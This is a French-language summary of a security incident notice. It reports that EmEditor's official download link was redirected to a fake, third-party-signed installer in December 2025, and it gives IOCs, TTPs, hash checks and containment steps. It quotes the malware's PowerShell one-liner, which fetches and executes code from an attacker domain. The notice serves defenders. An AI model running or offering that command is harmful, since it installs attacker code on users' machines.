Source: EmEditor (emeditor.com) — Le 22 décembre 2025, Yutaka Emura annonce qu’un tiers a potentiellement modifié la redirection du bouton « Download Now » sur le site officiel, pouvant délivrer un installeur non légitime entre le 19 déc. 2025 18:39 et le 22 déc. 2025 12:50 (heure du Pacifique).

L’URL de téléchargement légitime via redirection (https://support.emeditor.com/en/downloads/latest/installer/64) a été altérée pour pointer vers https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi. Le fichier servi n’a pas été créé par Emurasoft, Inc. et a été retiré. Le MSI potentiellement frauduleux porte une signature numérique « WALSHAM INVESTMENTS LIMITED ». Le problème pourrait toucher aussi des pages d’autres langues (dont le japonais).

Fichier concerné confirmé: emed64_25.4.3.msi. Détails — Légitime: 80 376 832 octets, signature Emurasoft, Inc., SHA‑256 e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e. Suspect: 80 380 416 octets, signature « WALSHAM INVESTMENTS LIMITED ». Non affectés: mises à jour via l’Update Checker/auto-update, téléchargements directs depuis download.emeditor.info (ex: https://download.emeditor.info/emed64_25.4.3.msi), autres fichiers que emed64_25.4.3.msi, version portable, version store, installation via winget, ou si le fichier a été téléchargé mais non exécuté.

Comportement observé: l’installeur suspect peut tenter d’exécuter la commande powershell.exe “irm emeditorjp.com | iex”, afin de télécharger et exécuter un contenu depuis emeditorjp.com, un domaine non géré par Emurasoft. L’installeur peut néanmoins procéder à l’installation normale d’EmEditor, rendant l’anomalie difficile à détecter.

Vérifications et actions: Emurasoft décrit la vérification de la signature numérique (Propriétés > Signatures numériques) et du SHA-256 (PowerShell: Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256) pour confirmer l’empreinte légitime. En cas de signature non Emurasoft ou de hash divergent: déconnecter immédiatement la machine du réseau, lancer un scan complet, envisager une reconstruction du système, considérer une exposition d’identifiants et changer les mots de passe (activer MFA), contacter l’équipe sécurité interne (CSIRT) et préserver les logs. L’enquête se poursuit; des mises à jour seront publiées sur les canaux officiels.

IOCs

  • Fichier suspect: emed64_25.4.3.msi (80 380 416 octets), signature « WALSHAM INVESTMENTS LIMITED »
  • Fichier légitime: emed64_25.4.3.msi (80 376 832 octets), signature Emurasoft, Inc., SHA‑256 e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
  • URL mal utilisée: https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi
  • Commande/Infrastructure: powershell.exe “irm emeditorjp.com | iex” ; domaine: emeditorjp.com (non géré par Emurasoft)
  • Période potentielle d’impact: 19 déc. 2025 18:39 – 22 déc. 2025 12:50 PT

TTPs

  • Altération de redirection web pour servir un binaire non légitime
  • Abus de signature de code (certificat tiers) pour légitimer un MSI
  • Exécution PowerShell de type living-off-the-land (irm | iex) pour téléchargement/exec à la volée
  • Déguisement via installation simultanée du logiciel légitime

Type d’article: annonce d’incident visant à informer les utilisateurs, fournir des indicateurs et les étapes de vérification/containment.

🔗 Source originale : https://www.emeditor.com/general/important-security-incident-notice-regarding-the-emeditor-installer-download-link/